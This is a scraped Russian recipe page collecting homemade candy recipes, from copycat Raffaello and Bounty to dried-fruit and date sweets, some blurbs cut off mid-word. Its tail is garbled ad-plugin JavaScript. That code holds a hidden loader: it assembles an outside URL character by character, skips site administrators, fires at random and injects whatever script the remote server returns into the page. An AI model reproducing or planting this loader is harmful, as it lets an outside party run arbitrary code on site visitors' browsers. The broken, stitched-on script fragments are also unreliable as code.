Домашние конфеты рецепт

Конфеты

Конфеты а-ля “Сникерс”

Этот рецепт из моей кулинарной тетрадочки. Приготовила его первый раз лет 10 назад. С тех пор частенько делаю эти конфетки! Рецепт настолько простой и быстрый, что с ним может справиться даже ребeнок! А вкусные какие получаются. И правда, чем – то похож на “Сникерс”! Побалуйте своих деток, думаю, они будут очень довольны.

Конфеты “Баунти”

Очень классный рецепт и очень-очень вкусный.

Конфеты “Рафаэлло”

Любите конфетки? Неохота печь тортик? Но есть минутка свободного времени? Побалуйте себя, удивите своих близких и гостей! По внешнему виду и вкусу – точь-в-точь магазинные “Рафаэлло”. Это элементарно, но вкуууууусно!

Конфеты “Карамельные”

Конфеты “Ирис”. По вкусу мне больше кажутся похожими на Ирис. Муж сказал, на конфеты “Коровка”. Делается просто. Можно иногда побаловать себя и деток) Мы скучаем по ирискам, по “коровке”, делаем сами. Может еще кому-то пригодится))

Конфеты “Ферреро”

Вот теперь можно сделать такие конфетки дома, по вкусу очень похожи на магазинные.

Каталонские конфеты

Каталонские конфеты – Catànies, каталонский бренд, изобретенный полвека назад каталонским кондитером Josep Cudié. Т. к. под рукой у меня не оказалось миндаля, я заменила успешно его на фундук. Конфеты потрясающие, надо сказать! Рука так и тянется за следующей.

Конфеты а-ля “Toffee”

Дорогие виртуально знакомые и незнакомые поварята, сегодня у меня маленькая дата! Сегодня ровно год нашей дружбы с Поварёнком! Дата маленькая, но я столько здесь для себя открыла, столько положительных эмоций получила, столько встретила дружелюбных и искренних людей! В этот день хочу угостить Вас чудесными конфетками а-ля “Toffee”)) Готовятся очень легко, а получаются не хуже покупных, а, может, и лучше! Давайте уже пить чай.

Домашние сливочные конфеты

Эти простые конфеты, по вкусу напоминающие “Коровки”, очень любимы моим сыном. Может быть и вашим домочадцам они понравятся.

Конфеты “Птичье молоко”

Конфеты получились вкуснее магазинных, не верите? Проверьте, это очень легко!

Итальянские новогодние конфеты а-ля “Торроне”

Итальянские новогодние конфеты а-ля Torrone. Здравствуйте, дорогие друзья! Спешу поделиться восхитительным итальянским десертом «Торроне». Он просто палочка-выручалочка для очень занятых или очень ленивых, но тем не менее желающих произвести впечатление на близких и друзей собственноручным кондитерским шедевром.

Конфеты. Конфеты – сладкие кондитерские изделия различных форм и размеров.

Рецептов приготовления конфет очень много. И появились они очень давно. Даже в древности люди готовили сладости. В Египте даже были найдены рукописи, в которых описана технология приготовления конфет. Главным компонентом их сладостей в те времена были финики.

Как правило, при приготовлении конфет в домашних условиях используют сахар, патоку и мед.

Из Древней Греции до нас дошел простой рецепт приготовления медовых конфет с фруктами. Берется курага и орехи в одинаковых пропорциях. Их нужно измельчить в миксере. Затем полученную крошку смешать с медом, слепить шарики и обвалять их в какао (а можно в вафельной или ореховой крошке, как это делали древние греки).

Самым простым рецептом конфет является рецепт леденцов. Для этого понадобится сахар и вода, которые доступны каждому. Сахар следует растопить на среднем огне с добавлением воды. Затем разлить массу в формочки для застывания.

Одним из популярных компонентов конфет дома является сухая детская смесь (или сухое молоко). На ее основе готовят многие домашние конфеты, например, рафаэлло, трюфели.

Также при приготовлении конфет никак не обойтись без глазури. Готовить ее несложно. Пропорции ингредиентов выбирают в зависимости от количества готового блюда. Главными компонентами глазури являются сахара, сливочное масло, какао и молоко (или сметана).

Кроме того, дома можно экспериментировать с различными добавками. Например, в шоколадные конфеты дополнительно можно добавить корицу, орехи, вафельную крошку, цукаты, кофе и т.д.

Плюс приготовления конфет в домашних условиях в том, что используются натуральные компоненты, без красителей и консервантов, продукты все свежие.

Конфеты

Домашние конфеты могут быть не только вкусными, но и полезными. Рецепты конфет можно разделить на орехово-фруктовые и все остальные. Для первого варианта конфет готовят смесь, измельчая вместе орехи и сухофрукты. Из этой смеси формируют небольшие шарики. Самый простой вариант домашних конфет из какао – шоколадные трюфели. Из смеси сливок/молока с сахаром варят помадку и ирис. На своей кухне можно приготовить и авторские шоколадные конфеты, но для этого придется повозиться.

Новогоднее пирожное «Мышки»

Несложный вариант домашних конфет из творога и кокосовой стружки можно оформить в виде белых мышей. Рецепт простой, а в результате получаются забавные фигурки, которыми можно украсить торт, пирожные или подать как десерт.

Апельсиновый маршмеллоу в домашних условиях

Этот рецепт маршмеллоу необычный. Он не только готовится самым простым способом, но еще и с добавлением апельсина – кусочков мякоти и сока. Жевательные конфетки-зефирки приятно пружинят, имеют цитрусовый аромат и вкус, плюс сюрприз в виде кусочка апе.

Конфеты из фиников и грецких орехов

Рецепт натуральных конфет, которые можно давать детворе. Для их изготовления будем использовать финики, грецкие орехи, мед и кокосовую стружку. Для основы конфет очищенные финики и грецкие орехи пропускают через мясорубку и смешивают с медом. Получае.

Домашние конфеты из фиников с курагой и кокосовой стружкой

Приготовить домашние конфеты можно из любых сухофруктов. Предлагаем опробовать рецепт самодельных конфет из фиников и кураги. Вместо сахара добавим натуральный мед любого сорта. Для панировки подойдет тертый кокосовый орех или готовая кокосовая струж.

Натуральные конфеты из чечевицы с орехами и кунжутом

С чего вообще идея делать домашние конфеты? Мысль стать домашним кондитером появляется тогда, когда хочется получить лакомство с известным и натуральным составом. Попробовать сделать самостоятельно конфеты может каждый. И это очень просто. Если дома .

Леденцы без формы

Для современных детей словосочетание «петушок на палочке» не значит абсолютно ничего, а вот у людей постарше оно вызывает внутренний трепет. Многие вспоминают нежные мамины руки, которые протягивают золотистый леденец, вкуснее которого, казалось, нет.

Конфеты из сухофруктов

Конфеты из сухофруктов и орехов своими руками – полезное лакомство, способное заменить привычные магазинные конфеты, радующее всех любителей натуральных продуктов и приверженцев правильно питания. Приготовить такие конфетки легко и просто, достаточн.

Грильяж из грецких орехов

Грильяж из грецких орехов по такому рецепту получается невероятно вкусным, сытным, в меру мягким. Тщательно соблюдая все рекомендации и пропорции, указанные в рецепте, вы получите очень питательную, калорийную и полезную сладость, которая поможет вам.

Бурфи – домашние конфеты из сухого молока и кунжута

Бурфи – индийский десерт типа помадки, приготовленной из уваренного сгущённого молока. Кунжутные конфеты бурфи – это одно из наиболее популярных восточных лакомств, история которого насчитывает тысячелетия. Приготовьте бурфи из кунжута по этому рецеп.

Курага в шоколаде

Домашние конфеты «Курага в шоколаде» не составить труда приготовить самостоятельно. Конечно, их можно купить в магазине, но полезнее, да и дешевле, приготовить дома. Глазурь можно делать такую, какую захотите, использовав черный, молочный или белый .

Апельсиново-ореховые конфеты

Никаких усилителей вкуса и искусственных консервантов, только натур-продукты. Таков рецепт конфет по-домашнему. Апельсин придаст им цитрусовую горчинку, мед сладость, орехи сытность. Вместо арахиса никто не запретит взять фундук или грецкие орехи. .

Домашние конфеты из печенья с черносливом

Хочется вкусных конфет, но нет желания идти в магазин? Вот рецепт малобюджетных мини-пирожных без выпечки из доступных продуктов. Не говорите гостям заранее из чего сделано ваше угощение. Пусть начинка из чернослива будет для них сюрпризом. .

Конфеты из смеси для детского питания с фундуком

Кто застал советские времена, должен помнить вкус домашних конфет из детской молочной смеси. И не спешите морщить нос! Это действительно вкусно. В том рецепте, помимо стандартного набора из сливочного масла и молочной смеси, добавлены «буржуинские» п.

Малиновые леденцы с имбирем и мёдом

Леденцы, приготовленные дома, станут прекрасным угощением для детей и взрослых. Этот рецепт конфет не содержит красителей, а дополнительные ингредиенты помогут создать неповторимый вкус и аромат. В нашем рецепте в сахарный сироп добавлены малина, имб.

Десерт «Калужское тесто» (русская кухня)

Калужское тесто – сладость на основе ржаных сухарей, известная в России с 1783 года. Еще не был известен тульский пряник, а калужское тесто уже пользовалось огромной популярностью. В записях за 1904 год перечислены такие виды калужского теста: «хлебн.

Творожные конфеты без сахара

Когда вы решаетесь скинуть несколько лишних килограммов к лету или какому-либо другому событию в вашей жизни, вы, разумеется, стремитесь исключить всё сладкое из своего рациона. Табу накладывается на все виды конфет, в особенности шоколадных. Чтобы к.

Домашние маршмеллоу

Маршмеллоу делают практически из «ничего». В состав сладости входят вода, желатин, ванилин и сахар. Из этого минимума компонентов получаются воздушные конфетки, которые так любят малыши и взрослые. Из маршмеллоу делают мастику для украшения десертов .

Шоколадно-ореховые конфеты с сухофруктами

Самодельные конфеты хороши тем, что точно знаешь, из чего они сделаны. Можно по своему вкусу добавить или убавить какой-то ингредиент. Этот рецепт для тех, кто любит сочетание орехов, чернослива и цитрусовых. Конфеты получаются немного тягучими, но н.

Конфеты «Прохладные шарики» из детского питания

Эти штучки – конфеты из смеси детского питания с мороженым – делали ещё в те времена, когда с продуктами было трудновато, поэтому изобретали кто во что горазд. И этот рецептик оказался довольно удачным.

Конфеты из сухофруктов с орехами

Для детей можно приготовить полезные конфеты по этому рецепту. Сухофрукты (курага, чернослив, изюм) и орехи (грецкие и фундук) пропускают через мясорубку, смешивают с медом. Из этой массы скатывают шарики и опускают их в растопленный шоколад.

Кнэкк (Knäck)

Knäck, Кнэкк – кофеты-тянучки, приготовленные из смеси жирных сливок, сахара, сахарного сиропа и миндаля. Традиционное рождественское лакомство на Рождество.

Кола (шведские рождественские сладости)

К Рождеству шведы готовят массу всяких сладостей, с огромным количеством сливок, шоколада и сахара. Я не особый их любитель, но мои в семье очень любят, поэтому и готовим.

Cappucinopraliner (шоколадные конфеты со вкусом каппучино)

Cappucinopraliner – шоколадные конфеты со вкусом каппучино. Готовить их несложно. Понадобятся жирные сливки, шоколад – черный и белый и кофе. Готовые конфеты прячьте в холодильник! Иначе прощай фигура. .

Пять рецептов домашних конфет без сахара

Для тех, кто обожает сладкое, но при этом не приемлет в своем рационе сахара – есть великолепные рецепты конфет, которые можно приготовить в домашних условиях. Из тех ингредиентов, что у вас имеются дома вы, наверняка, сможете сделать несколько видов сладостей. Выбирайте рецепт на свой вкус и готовьте натуральные конфеты из злаков, орехов, сухофруктов. К тому же десерт без химических добавок станет любимым и безопасным лакомством для детей.

Конфеты из кураги

Бесподобное лакомство, что заставит по-настоящему порадовать домочадцев и гостей.

Состав:

  • Мед натуральный – пол стакана;
  • Орех грецкий – 5 шт.;
  • Горький шоколад – 70 гр.;
  • Курага — 40 гр.;
  • Молоко – 1 ст. л.

Рецепт:

  1. Шоколад необходимо растопить, используя по желанию водяную баню или же микроволновую печь;
  2. Следующим шагом орехи, курагу измельчить острым ножом;
  3. Соединить все ингредиенты, хорошо размешать, дать остыть получившейся сладкой массе;
  4. Теперь начинаем формировать конфеты. Для этого следует скатать одинакового размера шарики.

Для украшения только что приготовленное лакомство слегка присыпают, либо какао-порошком, либо семенами кунжута. Обсыпьте или обваляйте в них конфеты и подавайте к столу.

Конфеты из инжира

Желаете отведать лакомство с необычным, тонким вкусом? Тогда попробуйте этот вариант!

Состав:

  • Шоколад – 70 гр.;
  • Грецкий орех – 3 шт.;
  • Инжир – 250 гр.;
  • Масло сливочное – 1 ст.л.

Рецепт:

Шоколад лучше всего взять горький, инжир в рецепте используется сушеный.

  1. Первым делом инжир положить в кружку, налить в нее кипяток, оставить на несколько минут;
  2. Растопить весь шоколад, положить в него масло;
  3. Вынуть инжир из воды и выполнить крестообразные надрезы с одной стороны;
  4. Сухофрукты аккуратно начинить кусочками орехов;
  5. Из ставшего пластичным инжира постараться слепить формы в виде трюфеля;
  6. Теперь стоит каждую заготовку обмакнуть в шоколад;
  7. Конфеты выкладываются на решетку до застывания;
  8. Как только политая глазурь начнет схватываться, сразу украсить конфеты. Обсыпаем инжирные трюфели какао-порошком, молотыми орехами;
  9. Готовые сладости следует отправить в холодное место до полного застывания.

Получившееся чудо будет просто таять во рту.

Конфеты из фиников

Если захотелось особенно вкусных конфет, да еще с ярким вкусом орешков, стоит приготовить их своими руками. Этот интересный рецепт требует минимум ингредиентов и вовсе не сложен.

Состав:

  • Фундук – 1 ст.;
  • Какао – 2 ст.л.;
  • Финики – 1 ст.;
  • Гречка (зеленая) – ½ ст.

Рецепт:

  1. В блендер положить орехи вместе с гречкой, после чего измельчить;
  2. Добавить какао с финиками, взбить;
  3. От получившейся массы отделять небольшие части и катать шарики.

Все! Выкладывайте конфеты на блюдо и можно лакомиться великолепными сладостями.

Конфеты из яблок

Для тех, кто предпочитает мягкие конфеты, есть идеальный рецепт, с ароматом яблок, кокоса и корицы. Уже голова закружилась от предвкушения таких изысков. Не забудьте подготовить все составляющие, а их здесь немало.

Состав:

  • Овсяные хлопья – полстакана;
  • Яблоки сушеные – 1 стакан;
  • Сок апельсина – 60 мл.;
  • Корица – 1 ч.л.;
  • Стружка кокоса – 2 ст.л.;
  • Сироп – 2 ст.л.

Рецепт:

  1. Первым делом яблоки с овсянкой нужно изрубить при помощи любого подходящего кухонного прибора;
  2. Высыпать перемолотую массу в чашу;
  3. Добавить в нее сок, корицу, а также любой сироп;
  4. Сформировать небольшие шарики;
  5. Обвалять конфетки в кокосе;
  6. Выложить в тарелку, отправить для застывания в холодильник.

Конфеты получаются невероятно нежными, вкусными. Главное хранить их стоит в холодном месте.

Конфеты из имбиря

Имбирь стал невероятно популярным продуктом в последнее время. Попробуйте самостоятельно создать из него конфеты и насладитесь необычным вкусом.

Состав:

  • Мед – 4 ст.л.;
  • Какао – 60 г.;
  • Какао-масло – 4 ст.л.;
  • Имбирь – ½ ст.л.;
  • Сок апельсиновый – 4 ст.л.;
  • Масло сливочное – 3 ст.л.

Рецепт:

Для конфет понадобится свежий корень имбиря.

  1. Масло-какао предварительно стоит растопить на водяной бане;
  2. Убрать с плиты, положить масло сливочное, хорошо растворить его;
  3. Сюда же добавить имбирь, а также какао, сок, все тщательно размешать;
  4. Смесь отправить в холодильник на десять минут;
  5. Когда масса немного застынет начать формировать трюфели.
  6. Украсить сладости при помощи какао-порошка;
  7. Убрать в холодильник.

Из полученных ингредиентов поучится примерно 15 оригинальных конфет.

Если хочется натуральных, вкуснейших и свежих конфет, вы всегда сможете их приготовить у себя дома. Их вкус и аромат покорит сердца всех сладкоежек.

Конфеты домашние / Рецепт с фото

Для того чтобы побаловать себя сладостями, не обязательно отправляться в кондитерский магазин. Многие лакомства можно приготовить своими руками, например, конфеты. Приготовленные в домашних условиях, ничем не уступают покупным: они такие же вкусные и красивые.

Главная особенность домашних сладостей – это возможность самостоятельно выбирать ингредиенты и корректировать рецепт. Так, сладости можно сделать диетическими или доработать рецепт, подходящий для аллергиков или маленьких детей.

СОДЕРЖАНИЕ

Ингредиенты:

Как приготовить домашние конфеты

2. Положить масло в кастрюлю, поставить на медленный огонь. Можно готовить на водяной бане.

3. Всыпаем сахарную пудру.

4. Затем добавляем какао.

5. Постепенно масло начнет растапливаться. Наколите его на вилку и перемешивайте ингредиенты, водя кусочком масла по дну кастрюли. Таким образом сахар не пригорит и все компоненты равномерно перемешаются.

6. Сухофрукты (в нашем случае, чернослив) мелко нарезать.

7. Всыпать чернослив в кастрюлю, перемешать и потомить еще 2-3 минуты на минимальном огне, беспрерывно перемешивая.

8. Полученную массу раскладываем в формочки для сладостей и отправляем в холодильник до полного остывания. В итоге можно посыпать домашние конфеты какао.

Вкусные домашние конфеты готовы

Приятного аппетита!

Домашние молочно — шоколадные конфеты

Эти сладости можно приготовить с разными начинками, например, с орехами, цукатами или густым джемом. Вкус лакомства тоже может быть различным, так, меняя соотношение молока и какао, может получиться как горький, так и молочный шоколад.
Для формирования сладостей можно использовать силиконовую форму.
Необходимые ингредиенты:

● какао-порошок – 70 г;
● мука – 15 г;
● сливочное масло – 45 г;
● сахарная пудра – 75 г;
● молоко – 50 мл;
● молоко сухое – 45 г.

В кастрюле с толстым дном растопите масло. К нему добавьте какао, молоко двух видов и пудру. Варите на медленном огне, постоянно до кипения.
Затем всыпьте муку и снова доведите до кипения.
Готовую массу остудите, разлейте в подготовленную форму и уберите в холод на пару часов.
По желанию, в сладости можно добавить начинку. Для этого дно и стенки формы смажьте шоколадом, выложите начинку и вылейте оставшуюся массу.
Рецепт шоколадного домашнего лакомства можно упростить. Для этого необходимо растопить покупной шоколад, добавить орехи, разлить в формочки и убрать в морозильник.

Конфеты домашние из сухофруктов и орехов

Эти сладости не только вкусные, но ещё содержат огромное количество полезных веществ.
Для приготовления понадобятся сухофрукты и орехи:

● изюм;
● курага;
● инжир;
● чернослив;
● арахис;
● фундук;
● грецкий орех.

Каждого наименование возьмите по 100 гр.
Можно выбрать только некоторые из списка или сделать с тем составом, который больше нравится.
Предварительно сухофрукты вымойте и замочите в кипятке на 20 минут. Орехи обжарьте и избавьтесь от шелухи.
Измельчите все в блендере. В смесь можно добавить несколько ложек мёда или сок половины лимона.
Все хорошо размешайте. Руками скатайте небольшие круглые конфеты.
По желанию их можно обсыпать кокосовой стружкой, маковыми зёрнами или кунжутом.

Домашние конфеты из сухофруктов, орехов и творога

Эти сладости благодаря составу могут стать отличным полезным перекусом.
Для приготовления потребуется:

● сушеная клюква – 50 г;
● чернослив с косточками – 150 г;
● светлый изюм – небольшая горсть;
● курага – 120 г;
● арахис – 110 г;
● творог 9% — пачка;
● фундук – 80 г;
● мёд – 30 г.

Из чернослива вытащите косточки. Все сухофрукты промойте и замочите в кипятке на полчаса. Орехи обжарьте и очистите от шелухи.
В блендере соедините подготовленные продукты с мёдом и измельчите. В полученную смесь добавьте творог и перемешайте.
Руками из массы сформируйте небольшие шарики и выложите на тарелку.
По желанию конфеты можно обсыпать какао или кокосовой стружкой.
Готовые сладости храните в холодильнике.

Конфеты домашние «Рафаэлло»

Для приготовления этих ароматных сладостей не потребуется много времени. А по вкусу готовое лакомство ничуть не уступает покупному. Этот рецепт можно усложнить, использую специальные вафельные полусферы для выкладывания начинки.
Для приготовления потребуется:

● миндаль – 20 шт.;
● сливочное масло – 35 г;
● кокосовая стружка – 120 г;
● молоко сгущенное – 200 г;
● белый шоколад – 45 г;
● ваниль или ванилин – на кончике ножа.

В конфетах используется очищенный миндаль, для этого его замочите в кипятке на ¼ часа. Слейте и снова поместите в кипяток уже на 10 минут. Затем снимите шкурку руками. Затем миндаль посушите на раскаленной сковороде и пока отложите.
На водяной бане растопите масло и шоколад. К ним добавьте половину веса стружки и сгущённое молоко.
Все хорошо перемешайте и уберите в холод на 6-8 часов или на ночь.
Теперь можно приступать к формированию сладостей. Вторую часть кокосовой стружки высыпите в маленькую глубокую тарелку, так будет удобнее делать обсыпку.
Из охлажденной массы отщипните кусочек, разомните, вложите орех и сформируйте шар. Опустите в стружку и равномерно посыпьте.

Домашние конфеты из детской смеси

Основа этих конфет – детская молочная смесь. Для их изготовления подойдут остатки или можно купить специально для этого. Доработав рецепт, эти конфеты можно приготовить для детей.
Для приготовления этих конфет потребуется:

• детская смесь – 200 г;
• молоко 3,2% — 120 мл;
• масло сливочное – 60 г;
• фруктоза – 40 г.

В сотейнике с толстым дном растопите масло, добавьте молоко и прокипятите несколько минут. Снимите с огня и дайте немного остыть. Затем добавьте фруктозу и смесь, и хорошо перемешайте.
От остывшей массы отщипните небольшой кусок и скатайте руками конфету произвольной формы.
Готовые сладости можно облить растопленным шоколадом или обсыпать какао-порошком, кокосовой стружкой, дробленым орехом или кунжутным семенем.
Для начинки подойдут любые орехи или цукаты.
Приготовление домашних конфет увлекательный процесс, в котором могут поучаствовать все члены семьи.

Видео рецепт «Конфеты домашние»

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),c=ff(window),b=ff("body"),g=void 0===flatPM_getCookie("flat_modal_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+a.ID+"_mb"),i="scroll.flatmodal"+a.ID,m="mouseleave.flatmodal"+a.ID+" blur.flatmodal"+a.ID,l=function(){var t,e,o;void 0!==a.how.popup.timer&&"true"==a.how.popup.timer&&(t=ff('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.popup.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))},s=function(){void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie&&g&&(flatPM_setCookie("flat_modal_"+a.ID+"_mb",!1),ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l()),void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie||(ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l())},ff("body > *").eq(0).before('
'+p+"
"),w=document.querySelector('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_modal-content'),flatPM_setHTML(w,e),"px"==a.how.popup.px_s?(c.bind(i,function(){c.scrollTop()>a.how.popup.after&&(c.unbind(i),b.unbind(m),s())}),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){c.unbind(i),b.unbind(m),s()})):(v=setTimeout(function(){b.unbind(m),s()},1e3*a.how.popup.after),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),s()}))),void 0!==a.how.outgoing){function n(){var t,e,o;void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer&&(t=ff('.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.outgoing.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie&&g&&(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n(),b.on("click",'.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_cross',function(){flatPM_setCookie("flat_out_"+a.ID+"_mb",!1)})),void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie||(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n())}var _,u="0"!=a.how.outgoing.indent?' style="bottom:'+a.how.outgoing.indent+'px"':"",p="true"==a.how.outgoing.cross?void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer?'
Закрыть через '+a.how.outgoing.timer_count+"
":'':"",c=ff(window),h="scroll.out"+a.ID,m="mouseleave.outgoing"+a.ID+" blur.outgoing"+a.ID,g=void 0===flatPM_getCookie("flat_out_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+a.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(a.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+p+"
");var v,w=document.querySelector('.fpm_5_out[data-id-out="'+a.ID+'"]');flatPM_setHTML(w,e),"px"==a.how.outgoing.px_s?(c.bind(h,function(){c.scrollTop()>a.how.outgoing.after&&(c.unbind(h),b.unbind(m),d())}),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){c.unbind(h),b.unbind(m),d()})):(v=setTimeout(function(){b.unbind(m),d()},1e3*a.how.outgoing.after),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),d()}))}}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==o.chapter_sub&&o.chapter_subflat_userVars.titlelen||void 0!==o.title_sub&&o.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,o=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,o)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var a=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;a');t=t.parent()[0];flatPM_sticky(this,t,o)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".fpm_5_out .fpm_5_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".fpm_5_modal .fpm_5_cross",function(){ff(this).closest(".fpm_5_modal").removeClass("fpm_5_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),ff("[data-flat-id]:not(.fpm_5_out):not(.fpm_5_modal)").contents().unwrap(),flatPM_ping()};var parseHTML=function(){var l=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,r,n,o=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=o.appendChild(t.createElement("div")),r=(d.exec(e)||["",""])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1]+e.replace(l,"$2>")+r[2],n=r[0];n--;)a=a.lastChild;for(o.removeChild(o.firstChild);a.firstChild;)o.appendChild(a.firstChild)}else o.appendChild(t.createTextNode(e));return o}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,166);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"r"+"e"+"a"+"d"+"o"+"n"+"e"+"."+"r"+"u"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var o=jQuery,t=e.selector,l=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",r=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,n='
'+a+" через "+l+'
'+r+'
',i=e.once;o(t).each(function(){var e=o(this);e.wrap('
');var t=e.closest(".fpm_5_video");flatPM_setHTML(t[0],n),e.find(".fpm_5_video_flex").one("click",function(){o(this).addClass("show")})}),o("body").on("click",".fpm_5_video_item_hover",function(){var e=o(this),t=e.closest(".fpm_5_video_flex");t.addClass("show");var a=t.find(".fpm_5_timer span"),r=parseInt(l),n=setInterval(function(){a.text(--r),r'):t.remove())},1e3);e.remove()}).on("click",".fpm_5_video_flex .fpm_5_cross",function(){o(this).closest(".fpm_5_video_flex").remove(),"true"==i&&o(".fpm_5_video_flex").remove()})};